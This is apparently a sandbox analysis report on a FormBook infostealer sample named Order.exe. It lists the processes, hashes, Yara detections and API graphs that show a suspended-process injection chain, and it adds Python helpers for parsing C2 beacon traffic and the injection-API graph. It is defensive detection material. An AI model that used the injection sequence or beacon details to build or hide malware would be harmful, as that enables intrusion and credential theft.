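# "Nov 12, 2024 15:32:28.499835014 CET342OUTGET /jlqg/?... HTTP/1.1"
START_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]+)"
    r"(?P<bytes>\d+)(?P<dir>IN|OUT)(?P<first>.+)$"
)
B64ISH = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")  # heuristic alphabet check


def split_params(s):
    """Split 'k=v&k2=v2' without URL-decoding so '+' and '/' in blobs survive."""
    out = {}
    for part in s.split("&"):
        if part:
            k, _, v = part.partition("=")
            out[k] = v
    return out


def parse_sessions(text):
    """Group the dump into request/response exchanges (one dict per request)."""
    exchanges, cur, phase = [], None, None
    for line in text.splitlines():
        m = START_RE.match(line)
        if m and m["dir"] == "OUT":
            method, target = m["first"].split(" ")[:2]
            cur = {"method": method, "target": target, "bytes_out": int(m["bytes"]),
                   "headers": {}, "body": "", "status": None,
                   "resp_headers": {}, "resp_body": ""}
            exchanges.append(cur)
            phase = "req"
        elif m and cur is not None:          # IN line: "HTTP/1.1 404 Not Found"
            cur["status"] = int(m["first"].split()[1])
            phase = "resp"
        elif cur is None or line.startswith("Data Raw:"):
            continue                          # hex dump duplicates Data Ascii
        elif line.startswith("Data Ascii: "):
            cur["body" if phase == "req" else "resp_body"] = line[len("Data Ascii: "):]
        elif ": " in line:
            k, v = line.split(": ", 1)
            (cur["headers"] if phase == "req" else cur["resp_headers"])[k.lower()] = v
    return exchanges


def beacon_features(ex):
    """Reduce one exchange to the fields that describe its beacon shape."""
    parts = urlsplit(ex["target"])
    params = split_params(parts.query if ex["method"] == "GET" else ex["body"])
    blob_key, blob = max(params.items(), key=lambda kv: len(kv[1]), default=("", ""))
    return {
        "host": ex["headers"].get("host", ""),
        "path": parts.path,
        "method": ex["method"],
        "blob_key": blob_key,                 # key carrying the longest value
        "blob_len": len(blob),
        "blob_b64ish": bool(B64ISH.match(blob)),
        "user_agent": ex["headers"].get("user-agent", ""),
        "close": ex["headers"].get("connection", "").lower() == "close",
        "status": ex["status"],
    }


def find_beacon_clusters(exchanges, min_hosts=2):
    """Flag a (blob key, User-Agent) pair reused against >= min_hosts hosts."""
    groups = defaultdict(list)
    for ex in exchanges:
        f = beacon_features(ex)
        if f["blob_key"] and f["blob_b64ish"] and f["close"]:
            groups[(f["blob_key"], f["user_agent"])].append(f)
    clusters = []
    for (key, ua), feats in groups.items():
        hosts = {f["host"] for f in feats}
        if len(hosts) >= min_hosts:
            clusters.append({"param": key, "user_agent": ua, "hosts": hosts,
                             "paths": {f["path"] for f in feats},
                             "all_404": all(f["status"] == 404 for f in feats)})
    return clusters


if __name__ == "__main__":
    for c in find_beacon_clusters(parse_sessions(SAMPLE)):
        print(c)
```

Run against the full session listing, the cluster comes out with the two hosts and both paths (/jlqg/ and /4xim/) and all_404 set; a live C2 would show up as the one host in the cluster whose status is not 404.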



                                                              Target ID:0
                                                              Start time:09:29:43
                                                              Start date:12/11/2024
                                                              Path:C:\Users\user\Desktop\Order.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Order.exe"
                                                              Imagebase:0x430000
                                                              File size:704'000 bytes
                                                              MD5 hash:7E1AFC9B104325C33A1A94E672725E0B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:09:29:59
                                                              Start date:12/11/2024
                                                              Path:C:\Users\user\Desktop\Order.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Order.exe"
                                                              Imagebase:0xf40000
                                                              File size:704'000 bytes
                                                              MD5 hash:7E1AFC9B104325C33A1A94E672725E0B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1783850958.0000000001D30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1784067964.0000000003230000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:11:28:10
                                                              Start date:12/11/2024
                                                              Path:C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe"
                                                              Imagebase:0x1d0000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:12
                                                              Start time:11:28:12
                                                              Start date:12/11/2024
                                                              Path:C:\Windows\SysWOW64\fc.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                              Imagebase:0x510000
                                                              File size:22'528 bytes
                                                              MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3127049322.0000000003750000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3127133460.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false

                                                              Target ID:16
                                                              Start time:11:28:43
                                                              Start date:12/11/2024
                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                              Imagebase:0x7ff722870000
                                                              File size:676'768 bytes
                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true


                                                                Execution Graph

                                                                Execution Coverage:7.6%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:69
                                                                Total number of Limit Nodes:10
                                                                execution_graph (flattened by the report; nodes are listed as "<node id> <address> [API]", edges as "<node>-><node>", grouped here by connected subgraph):
                                                                • Nodes: 27765 6d0d670; 27766 6d0d6b0 VirtualAllocEx; 27768 6d0d6ed. Edges: 27765->27766, 27766->27768
                                                                • Nodes: 27769 6d0d730; 27770 6d0d778 WriteProcessMemory; 27772 6d0d7cf. Edges: 27769->27770, 27770->27772
                                                                • Nodes: 27773 6d0fa30; 27774 6d0fbbb; 27775 6d0fa56; 27777 6d0bdf0; 27778 6d0fcb0 PostMessageW; 27779 6d0fd1c. Edges: 27773->27774, 27773->27775, 27775->27774, 27775->27777, 27777->27778, 27778->27779, 27779->27775
                                                                • Nodes: 27788 6d0d820; 27789 6d0d86b ReadProcessMemory; 27791 6d0d8af. Edges: 27788->27789, 27789->27791
                                                                • Nodes: 27734 eb4668; 27735 eb467a; 27736 eb4686; 27738 eb4778; 27739 eb479d; 27744 eb4888; 27748 eb4887; 27752 eb4878; 27746 eb48af; 27745 eb498c; 27757 eb44e0; 27750 eb48af; 27749 eb498c; 27751 eb44e0 CreateActCtxA; 27753 eb47a7; 27755 eb48da; 27754 eb498c; 27756 eb44e0 CreateActCtxA; 27758 eb5918 CreateActCtxA; 27760 eb59db. Edges: 27734->27735, 27735->27736, 27735->27738, 27738->27739, 27739->27744, 27739->27748, 27739->27752, 27744->27746, 27745->27745, 27746->27745, 27746->27757, 27748->27750, 27749->27749, 27750->27749, 27750->27751, 27751->27749, 27752->27753, 27752->27755, 27753->27736, 27754->27754, 27755->27754, 27755->27756, 27756->27754, 27757->27758, 27758->27760, 27760->27760
                                                                • Nodes: 27792 ebd458; 27793 ebd49e GetCurrentProcess; 27795 ebd4e9; 27796 ebd4f0 GetCurrentThread; 27797 ebd52d GetCurrentProcess; 27798 ebd526; 27799 ebd563; 27800 ebd58b GetCurrentThreadId; 27801 ebd5bc. Edges: 27792->27793, 27793->27795, 27793->27796, 27795->27796, 27796->27797, 27796->27798, 27797->27799, 27798->27797, 27799->27800, 27800->27801
                                                                • Nodes: 27780 6d0d9b8; 27781 6d0da41 CreateProcessA; 27783 6d0dc03. Edges: 27780->27781, 27781->27783, 27783->27783
                                                                • Nodes: 27784 6d0cc78; 27785 6d0ccb8 ResumeThread; 27787 6d0cce9. Edges: 27784->27785, 27785->27787
                                                                • Nodes: 27802 6d0cd28; 27803 6d0cd6d Wow64SetThreadContext; 27805 6d0cdb5. Edges: 27802->27803, 27803->27805
                                                                • Nodes: 27763 7091410 CloseHandle; 27764 709146a. Edges: 27763->27764
                                                                • Nodes: 27761 ebd6a0 DuplicateHandle; 27762 ebd736. Edges: 27761->27762
                                                                • Nodes: 27806 ebacd0; 27810 ebadb9; 27815 ebadc8; 27807 ebacdf; 27811 ebadfc; 27812 ebadd9; 27813 ebb000 GetModuleHandleW; 27814 ebb02d; 27816 ebadd9; 27817 ebadfc; 27818 ebb000 GetModuleHandleW; 27819 ebb02d. Edges: 27806->27810, 27806->27815, 27810->27811, 27810->27812, 27811->27807, 27812->27811, 27812->27813, 27813->27814, 27814->27807, 27815->27816, 27815->27817, 27816->27817, 27816->27818, 27817->27807, 27818->27819, 27819->27807
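Joe Sandbox emits the execution graph as a flat token stream (node id, address, optional API name, and a->b edges), and the API nodes it contains here (CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread) are the calls of a suspended-process injection into a 32-bit target. The parser below is an added example, not Joe Sandbox code: it rebuilds the per-function subgraphs from that token stream and reports which steps of the chain appear. SAMPLE is a constructed, shortened copy of the listing; the chain order in INJECTION_CHAIN is the conventional one and is an assumption of this example, since each API sits in its own subgraph and the graph alone does not fix the call order.

```python
"""Recover API-call subgraphs from a Joe Sandbox execution-graph dump.

Added example, not Joe Sandbox tooling. The token format (node id, address,
optional API name, "a->b" edges) and the API names come from the execution_graph
listing in this report; SAMPLE is a constructed, shortened copy of it.
"""
import re

SAMPLE = (
    "execution_graph 27765 6d0d670 27766 6d0d6b0 VirtualAllocEx 27765->27766 "
    "27768 6d0d6ed 27766->27768 27769 6d0d730 27770 6d0d778 WriteProcessMemory "
    "27769->27770 27772 6d0d7cf 27770->27772 27788 6d0d820 27789 6d0d86b "
    "ReadProcessMemory 27788->27789 27791 6d0d8af 27789->27791 27780 6d0d9b8 "
    "27781 6d0da41 CreateProcessA 27780->27781 27783 6d0dc03 27781->27783 "
    "27783->27783 27784 6d0cc78 27785 6d0ccb8 ResumeThread 27784->27785 "
    "27787 6d0cce9 27785->27787 27802 6d0cd28 27803 6d0cd6d Wow64SetThreadContext "
    "27802->27803 27805 6d0cdb5 27803->27805 27763 7091410 CloseHandle "
    "27764 709146a 27763->27764"
)

# Conventional order for starting a process suspended, writing into it, and
# resuming it. Assumed for this example; the graph only shows presence.
INJECTION_CHAIN = ("CreateProcessA", "VirtualAllocEx", "WriteProcessMemory",
                   "Wow64SetThreadContext", "ResumeThread")

HEXISH = re.compile(r"[0-9a-f]+")  # addresses; note "7091410" is hex, not an id


def parse_graph(text):
    """Return ({node_id: (addr, api_or_None)}, [(src, dst), ...])."""
    nodes, edges, last, want_addr = {}, [], None, False
    for tok in text.split():
        if "->" in tok:
            src, dst = tok.split("->", 1)
            edges.append((src, dst))
        elif want_addr:                     # token after a node id is its address
            nodes[last] = [tok, None]
            want_addr = False
        elif tok.isdigit():                 # a new node id
            last, want_addr = tok, True
        elif not HEXISH.fullmatch(tok) and last in nodes:
            nodes[last][1] = tok            # an API name attached to the last node
        # anything else (the leading "execution_graph" label) is skipped
    return {k: tuple(v) for k, v in nodes.items()}, edges


def components(nodes, edges):
    """Weakly connected components (the sandbox emits one per function)."""
    parent = {n: n for n in nodes}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for a, b in edges:
        if a in parent and b in parent:
            parent[find(a)] = find(b)
    groups = {}
    for n in nodes:
        groups.setdefault(find(n), []).append(n)
    return list(groups.values())


def api_calls_by_component(nodes, edges):
    """Map each component's lowest address to the API names it contains."""
    out = {}
    for comp in components(nodes, edges):
        ordered = sorted(comp, key=lambda n: int(nodes[n][0], 16))
        out[nodes[ordered[0]][0]] = [nodes[n][1] for n in ordered if nodes[n][1]]
    return out


def injection_chain_coverage(nodes):
    """Steps of INJECTION_CHAIN present anywhere in the graph, in chain order."""
    seen = {api for _, api in nodes.values() if api}
    return tuple(step for step in INJECTION_CHAIN if step in seen)


if __name__ == "__main__":
    n, e = parse_graph(SAMPLE)
    for addr, apis in sorted(api_calls_by_component(n, e).items()):
        print(addr, apis)
    print("chain steps seen:", injection_chain_coverage(n))
```

Because each API lives in its own subgraph, the ordering has to come from elsewhere (the API trace or the memory dump), which is why the function reports coverage rather than claiming a sequence.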
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424285196.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7090000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78cc55b2ef8da634f5fc29ee08e53dc3de3f562f91da80b0f5cc269e79e12efc
                                                                • Instruction ID: 3b3bd80b1f6118f4e070e1b320340744eb9c4032ec9daee97e20c319c6d865d7
                                                                • Opcode Fuzzy Hash: 78cc55b2ef8da634f5fc29ee08e53dc3de3f562f91da80b0f5cc269e79e12efc
                                                                • Instruction Fuzzy Hash: 6522BBB1B012069FDB68DB65C450BAEB7F6AF89700F2445B9E146EB3A1CB31ED01CB51

Control-flow Graph

• Function ebd448 (basic blocks ebd448-ebd625): GetCurrentProcess at ebd448-ebd4e7, GetCurrentThread at ebd4f0-ebd524, GetCurrentProcess at ebd52d-ebd561, call to ebd629 at ebd56a-ebd585, GetCurrentThreadId at ebd58b-ebd5ba.
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00EBD4D6
                                                                • GetCurrentThread.KERNEL32 ref: 00EBD513
                                                                • GetCurrentProcess.KERNEL32 ref: 00EBD550
                                                                • GetCurrentThreadId.KERNEL32 ref: 00EBD5A9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: 5e1e75a9da7d0912528b1d8098ab3e8732b75c7f6ec30804d7a2557a16c1c1d6
                                                                • Instruction ID: 4155cb85fa631e799fe6317e1d21527792f4bd997a1470d769b4e0ac8851f0a7
                                                                • Opcode Fuzzy Hash: 5e1e75a9da7d0912528b1d8098ab3e8732b75c7f6ec30804d7a2557a16c1c1d6
                                                                • Instruction Fuzzy Hash: 63516AB49017098FDB14DFA9D9497DEBBF2EF88304F208059E419A7290D778A944CF66

Control-flow Graph

• Function ebd458 (basic blocks ebd458-ebd625): GetCurrentProcess at ebd458-ebd4e7, GetCurrentThread at ebd4f0-ebd524, GetCurrentProcess at ebd52d-ebd561, call to ebd629 at ebd56a-ebd585, GetCurrentThreadId at ebd58b-ebd5ba.
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00EBD4D6
                                                                • GetCurrentThread.KERNEL32 ref: 00EBD513
                                                                • GetCurrentProcess.KERNEL32 ref: 00EBD550
                                                                • GetCurrentThreadId.KERNEL32 ref: 00EBD5A9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: d452b2459d572e908018316b5500190734acea33ed7e935c795f3704697c97e1
                                                                • Instruction ID: c80307b97d31c32fc36f93f9e9e639e0bd1384e2ab0e8581da9f7e2aeb120842
                                                                • Opcode Fuzzy Hash: d452b2459d572e908018316b5500190734acea33ed7e935c795f3704697c97e1
                                                                • Instruction Fuzzy Hash: FB5158B49013098FDB14DFA9D949BDEBBF1EF88314F208059E419A7250D778A944CF66

Control-flow Graph

• Function 6d0d9ac (basic blocks 6d0d9ac-6d0dcfd): three self-looping blocks before the call (6d0da6d-6d0da7c, 6d0dac6-6d0dad5, 6d0db2e-6d0db3d), CreateProcessA at 6d0db47-6d0dc01, then a chain of small conditional blocks 6d0dc0a-6d0dcf6 ending in the self-looping block 6d0dcfd.
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D0DBEE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 457232946340a32c387299065eaf16f42db186452d8876bac637ba49faa66321
                                                                • Instruction ID: 48e7f395ebc304639d1d61fe8025a0bbb25159026a38bc79168eafb88f5d2bf7
                                                                • Opcode Fuzzy Hash: 457232946340a32c387299065eaf16f42db186452d8876bac637ba49faa66321
                                                                • Instruction Fuzzy Hash: CEA15C71D003198FEB64DFA8C841BEDBBB2FF48314F14856AE859A7280DB749985CF91

Control-flow Graph

• Function 6d0d9b8 (basic blocks 6d0d9b8-6d0dcfd): three self-looping blocks before the call (6d0da6d-6d0da7c, 6d0dac6-6d0dad5, 6d0db2e-6d0db3d), CreateProcessA at 6d0db47-6d0dc01, then a chain of small conditional blocks 6d0dc0a-6d0dcf6 ending in the self-looping block 6d0dcfd.
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D0DBEE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 9d5087cc7907801f1eefca7bac56ae56912ae7d38f80eaee74e806dd6cdf9fad
                                                                • Instruction ID: 6e6a3aa42d921c0e49411c0687297a5416db7ffcec7300faeade8934930fae49
                                                                • Opcode Fuzzy Hash: 9d5087cc7907801f1eefca7bac56ae56912ae7d38f80eaee74e806dd6cdf9fad
                                                                • Instruction Fuzzy Hash: 54915C71D003198FEB64DFA8C841BEDBBB2FF48310F14856AE819A7280DB749985CF91

Control-flow Graph

• Function ebadc8 (basic blocks ebadc8-ebb048): calls to eba120, ebb05f / ebb060, eba12c, eba13c, eba14c and eba15c, then GetModuleHandleW at ebb000-ebb02b.
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00EBB01E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 7fdc83313d41481f7626bed8a6582c1c94c3fdfdfd691e78f484a86c8579eccc
                                                                • Instruction ID: c73906bc6161efbf315fa9d276945ee4fe2c320b67099a55dde04b2975de602f
                                                                • Opcode Fuzzy Hash: 7fdc83313d41481f7626bed8a6582c1c94c3fdfdfd691e78f484a86c8579eccc
                                                                • Instruction Fuzzy Hash: D7712470A00B058FDB24DF29D45579BBBF1BF88304F14892DE48AE7A50D775E845CB91

Control-flow Graph

• Function eb590d (basic blocks eb590d-eb5a61): CreateActCtxA in the entry block eb590d-eb59d9, ending in the self-looping block eb5a61.
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 00EB59C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 3ff38cdcfb1bdc891ccfc9dcb1b76ee466582d928b671b02a4d6f56d04ca24b4
                                                                • Instruction ID: 834ac3189fe32bc52dcf899a0a13b6f68a89dbfe87c27251d7fb6a80e5749785
                                                                • Opcode Fuzzy Hash: 3ff38cdcfb1bdc891ccfc9dcb1b76ee466582d928b671b02a4d6f56d04ca24b4
                                                                • Instruction Fuzzy Hash: 4B41D272C0071ACBDB24DFA9C8857CEBBB1BF49304F20816AD508BB251DB756946CF50

Control-flow Graph

• Function eb44e0 (basic blocks eb44e0-eb5a61): CreateActCtxA in the entry block eb44e0-eb59d9, ending in the self-looping block eb5a61.
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 00EB59C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 76c18a72e71d918e45d6419ed3449ad2b4e979169b15c550d03f60d6136a2a36
                                                                • Instruction ID: 235baf7cabbc3f7594b32de2770dc81d455f901fce130400b4b46ad251d4115f
                                                                • Opcode Fuzzy Hash: 76c18a72e71d918e45d6419ed3449ad2b4e979169b15c550d03f60d6136a2a36
                                                                • Instruction Fuzzy Hash: 7C41E1B1C00719CBEB24DFA9C8447CEBBB1BF49304F20816AD508BB251DB756946CF90

Control-flow Graph

• Function 6d0d728 (basic blocks 6d0d728-6d0d806): WriteProcessMemory at 6d0d78e-6d0d7cd.
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D0D7C0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 7afff1bccf8f0ea89729331d3b16f76fa80009b41d946d0d4fe6e25a1badf446
                                                                • Instruction ID: b25d46e743a2583ebfdb8688f1453dbb507a14f929d78108b440576f9793c19e
                                                                • Opcode Fuzzy Hash: 7afff1bccf8f0ea89729331d3b16f76fa80009b41d946d0d4fe6e25a1badf446
                                                                • Instruction Fuzzy Hash: 1B213575D003099FDB10CFAAC885BDEBBF5FF48310F10842AE959A7241DB799944CBA4

Control-flow Graph

• Function 6d0d730 (basic blocks 6d0d730-6d0d806): WriteProcessMemory at 6d0d78e-6d0d7cd.
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D0D7C0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 5cfecfa9749a589e2ef91f771ea13758572b94ff6d0930af6b8f9bc60e040d18
                                                                • Instruction ID: c28b070d2d7637cb037d5f16273d84ce5a68a0a49d6122d16d091521ee7291c1
                                                                • Opcode Fuzzy Hash: 5cfecfa9749a589e2ef91f771ea13758572b94ff6d0930af6b8f9bc60e040d18
                                                                • Instruction Fuzzy Hash: 4E213675D003099FDB10DFAAC881BDEBBF5FF48310F50842AE919A7280D7799944CBA4

Control-flow Graph

• Function 6d0cd20 (basic blocks 6d0cd20-6d0cdec): Wow64SetThreadContext at 6d0cd8d-6d0cdb3.
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D0CDA6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: 6a72b3dbcba82d9b4ccbaeef14fd5aea393e958e5f98f8e5095bd8646978e2a6
                                                                • Instruction ID: e6eb0bd755294aaceeca7fef9dd4ca43d6b73cdd253461a55d4dc98d239f0420
                                                                • Opcode Fuzzy Hash: 6a72b3dbcba82d9b4ccbaeef14fd5aea393e958e5f98f8e5095bd8646978e2a6
                                                                • Instruction Fuzzy Hash: A7212875D103098FDB20DFAAC8857EEBBF4EF88320F548429D559A7280DB789945CFA4

Control-flow Graph

• Function 6d0d818 (basic blocks 6d0d818-6d0d8e6): ReadProcessMemory in the entry block 6d0d818-6d0d8ad.
                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D0D8A0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: 1de7f1352aee778978680da3d2fca2521fc93188ef53bc41e819991b28a1e65e
                                                                • Instruction ID: 3d1f75146f2a173c121dae21f0b07c27de506f143901e17c2577a90da470cda0
                                                                • Opcode Fuzzy Hash: 1de7f1352aee778978680da3d2fca2521fc93188ef53bc41e819991b28a1e65e
                                                                • Instruction Fuzzy Hash: 55211671C013599FDB10DFAAC841BEEBBF5FF48310F50842AE919A7240DB399945CBA4
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EBD727
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D0CDA6
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D0D8A0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EBD727
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D0D6DE
APIs
• API ID: ResumeThread
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D0D6DE
APIs
• API ID: ResumeThread
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00EBB01E
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 06D0FD0D
APIs
• CloseHandle.KERNELBASE(?), ref: 07091468
APIs
• CloseHandle.KERNELBASE(?), ref: 07091468
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
